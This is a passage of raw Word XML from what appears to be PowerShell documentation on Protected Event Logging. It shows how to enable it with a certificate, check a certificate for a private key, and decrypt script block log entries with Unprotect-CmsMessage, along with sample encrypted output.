          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t xml:space="preserve"> C:\temp\ProtectedEventLogging.cer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>–Raw</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD18D1" w:rsidRDefault="00BD18D1" w:rsidP="00BD18D1">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PS C:\temp&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t xml:space="preserve">Enable-ProtectedEventLogging </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t xml:space="preserve">–Certificate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="00FF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>$cert</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006027BB" w:rsidRDefault="006E6340" w:rsidP="00882495">
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="006027BB">
        <w:t xml:space="preserve">Protected event logging must be configured </w:t>
      </w:r>
      <w:r w:rsidR="006027BB" w:rsidRPr="006027BB">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>in addition</w:t>
      </w:r>
      <w:r w:rsidR="006027BB">
        <w:t xml:space="preserve"> to enabling any application-specific logging. Enabling protected event logging doesn’t automatically enable event sources such as PowerShell script block logging.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE1E0F" w:rsidRDefault="00DE1E0F" w:rsidP="00882495">
      <w:r>
        <w:t xml:space="preserve">If an application cannot properly resolve </w:t>
      </w:r>
      <w:r w:rsidR="00C75FBE">
        <w:t>the encryption certificate during logging, it will log a warning message into its event log channel, and then continue to log the data without event log protection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E2929" w:rsidRDefault="00665E50" w:rsidP="00882495">
      <w:r>
        <w:t xml:space="preserve">When configuring the encryption certificate for deployment, ensure that </w:t>
      </w:r>
      <w:r w:rsidR="00EB0204">
        <w:t xml:space="preserve">it doesn’t include </w:t>
      </w:r>
      <w:r>
        <w:t>the private key.</w:t>
      </w:r>
      <w:r w:rsidR="00A91A28">
        <w:t xml:space="preserve"> If the certificate includes the private key, then it can also be used to decrypt the protected event log content.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00576BF7" w:rsidRDefault="00285B27" w:rsidP="00882495">
      <w:r>
        <w:t xml:space="preserve">The following commands show how to determine if a Document Encryption certificate on a node has </w:t>
      </w:r>
      <w:r w:rsidR="000B7072">
        <w:t xml:space="preserve">been deployed with a </w:t>
      </w:r>
      <w:r>
        <w:t>private key:</w:t>
      </w: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PS Cert:\CurrentUser\My&gt; dir -DocumentEncryptionCert</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00285B27" w:rsidRPr="00576BF7" w:rsidRDefault="00285B27" w:rsidP="00285B27">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pP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 xml:space="preserve">    Directory: Microsoft.PowerShell.Security\Certificate::CurrentUser\My</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00285B27" w:rsidRPr="00576BF7" w:rsidRDefault="00285B27" w:rsidP="00285B27">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pP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Thumbprint                                Subject</w:t>
      </w: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                                -------</w:t>
      </w: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5EE994BD4C0B79ADFAA7890D7D3FBE820CF03282  CN=ProtectedEventLogging</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00285B27" w:rsidRPr="00576BF7" w:rsidRDefault="00285B27" w:rsidP="00285B27">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00285B27" w:rsidRPr="00576BF7" w:rsidRDefault="00285B27" w:rsidP="00285B27">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00576BF7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>PS Cert:\CurrentUser\My&gt; (dir -DocumentEncryptionCert).HasPrivateKey</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00285B27" w:rsidRDefault="00285B27" w:rsidP="00285B27">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00576BF7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>True</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00285B27" w:rsidRDefault="004275FC" w:rsidP="00285B27">
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">To post-process the content of protected event log messages, use the PowerShell </w:t>
      </w:r>
      <w:r w:rsidRPr="004275FC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Unprotect-CmsMessage</w:t>
      </w:r>
      <w:r w:rsidR="003E2461">
        <w:t xml:space="preserve"> cmdlet and </w:t>
      </w:r>
      <w:r w:rsidR="00FB6665" w:rsidRPr="00FB6665">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00FB6665" w:rsidRPr="00FB6665">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref416043963 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="00FB6665">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidR="00FB6665" w:rsidRPr="00FB6665">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00FB6665" w:rsidRPr="00FB6665">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="001E1DF8" w:rsidRPr="001E1DF8">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>Cryptographic Message Syntax (CMS) encryption and decryption cmdlets</w:t>
      </w:r>
      <w:r w:rsidR="00FB6665" w:rsidRPr="00FB6665">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="003E2461">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00882495" w:rsidRDefault="007E6B7E" w:rsidP="00CE3678">
      <w:r>
        <w:t xml:space="preserve">For example, the following PowerShell commands automatically </w:t>
      </w:r>
      <w:r w:rsidR="002B4900">
        <w:t>decrypt encrypted event log messages, provided that an appropriate decryption certificate (i.e.: one that has the private key) is installed on the machine:</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PS C:\temp&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>Get-WinEvent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t xml:space="preserve"> Microsoft-Windows-PowerShell/Operational |</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    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>Where-Object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t xml:space="preserve"> Id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>-eq</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>4104</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t xml:space="preserve"> Message</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Creating Scriptblock text (1 of 1):</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-----BEGIN CMS-----</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MIIBqAYJKoZIhvcNAQcDoIIBmTCCAZUCAQAxggFQMIIBTAIBADA0MCAxHjAcBgNVBAMMFWxlZWhv</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bG1AbWljcm9zb2Z0LmNvbQIQIHYCpaWKj79MCPOeLV5rmjANBgkqhkiG9w0BAQcwAASCAQAyRMrz</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bT6xs/AXl9OZtEhRW2LuiRpHy/texsSvWGvaVWALEB8a5DrPFwsxmunLBMssX69FoTDROTtTAthU</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5QqCg5y891YIk3WRkjgTXGuWUBji8X+iyXKN0O5urpM3wFZLYroCZbsnVYcZYzbLcu4mfuNwpu9Q</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RDPVjegXXU5gyxKaFvnEfPGWSE/17nJRkjFFlofjgO4W3mgHVEYt4Vtfa01LRgO+SE8n1MDQXTN7</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yw9+AFiFCsyDmzD131QLook54WC8LVy0NS5Nf5h4FM27/cn2GZfOoh/dP7wN/VA++Xsej7wkHyP3</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5H8dxqhtGM2LkVG30LRIQJVmc0VfK5eNMDwGCSqGSIb3DQEHATAdBglghkgBZQMEASoEEC0VkkV4</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IRHrhavdVSpu316AEO2RFE90vfU9S9L9nTQ2CzE=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
        <w:t>-----END CMS-----</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t>ScriptBlock ID: df0db710-b6f6-4f12-8c10-bb6e724bdea2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
        <w:t>Creating Scriptblock text (1 of 1):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
        <w:t>-----BEGIN CMS-----</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
        <w:t>MIIBqAYJKoZIhvcNAQcDoIIBmTCCAZUCAQAxggFQMIIBTAIBADA0MCAxHjAcBgNVBAMMFWxlZWhv</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bG1AbWljcm9zb2Z0LmNvbQIQIHYCpaWKj79MCPOeLV5rmjANBgkqhkiG9w0BAQcwAASCAQBls/kL</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EqGJYOJHTVqe3toLwP55V1rAcpGKLqdQh5+dwjGtcBrIXLM+bh7fNJMER4ZtWQjOtOL+9TfCDupo</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NOsD6kaaN1zozw3f1degUOZZ+a1Fjqg4DopUOhpOGC4TXCNdokhPEA2wfaVxNQeWH0sz/6uxkdt4</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fZzu73szyYalE2/oK8ua0KFiV4oN7YToUqjas7Lrxgrss2s0KpMa0aXzomdlgqinjtxxaqfN9hXw</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S7eSiiMWcSoQrGkBAdO95O7SDaVwyrr91Q5j3ipStJ9tT5JZYBH2Rt0lPGQJri/9XwVZWcqyPdsy</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Dw//PRoduOvLoDJGmiPJPOXZcxku2V/hMDwGCSqGSIb3DQEHATAdBglghkgBZQMEASoEECJp7jZ3</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h/8GOVAzagX0jjCAEMbLKx+cTg8YJiTH1tY3PTw=</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-----END CMS-----</w:t>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ScriptBlock ID: f35edb0c-8d5a-46fd-a0c9-8984f4622f38</w:t>
      </w:r>
      <w:r w:rsidR="00242E96">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00242E96"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PS C:\temp&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>Get-WinEvent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t xml:space="preserve"> Microsoft-Windows-PowerShell/Operational |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B4900" w:rsidRDefault="00242E96"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    </w:t>
      </w:r>
      <w:r w:rsidR="002B4900">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>Where-Object</w:t>
      </w:r>
      <w:r w:rsidR="002B4900">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t xml:space="preserve"> Id </w:t>
      </w:r>
      <w:r w:rsidR="002B4900">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>-eq</w:t>
      </w:r>
      <w:r w:rsidR="002B4900">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002B4900">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>4104</w:t>
      </w:r>
      <w:r w:rsidR="002B4900">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:r w:rsidR="002B4900">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>Unprotect-CmsMessage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B4900" w:rsidRDefault="002B4900"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prompt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B4900" w:rsidRDefault="001158DA" w:rsidP="002B4900">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"Hello World"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B4900" w:rsidRDefault="002B4900" w:rsidP="00CE3678"/>
    <w:p w:rsidR="001158DA" w:rsidRDefault="001158DA" w:rsidP="00CE3678">
      <w:r>
        <w:t xml:space="preserve">To retain the structure of the actual event log entry (while just decrypting the </w:t>
      </w:r>
      <w:r w:rsidRPr="001158DA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Message</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> field), use the </w:t>
      </w:r>
      <w:r w:rsidRPr="001158DA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>–IncludeContext</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> parameter:</w:t>
      </w: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PS C:\temp&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>Get-WinEvent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t xml:space="preserve"> Microsoft-Windows-PowerShell/Operational | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t xml:space="preserve"> Id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>-eq</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>4104</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t xml:space="preserve"> |</w:t>
      </w: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&gt;&gt;&gt;     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>Unprotect-CmsMessage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>-IncludeContext</w:t>
      </w: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xml:space="preserve">   ProviderName: Microsoft-Windows-PowerShell</w:t>
      </w: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TimeCreated                     Id LevelDisplayName Message</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001158DA"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                     -- ---------------- -------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001158DA" w:rsidRDefault="00E30FCD"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4/3</w:t>
      </w:r>
      <w:r w:rsidR="001158DA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>/2015 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="001158DA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>:47:13 AM          4104 Verbose          Creating Scriptblock text (1 of 1):...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C465B5" w:rsidRDefault="001158DA" w:rsidP="001158DA">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>4/</w:t>
      </w:r>
      <w:r w:rsidR="00E30FCD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
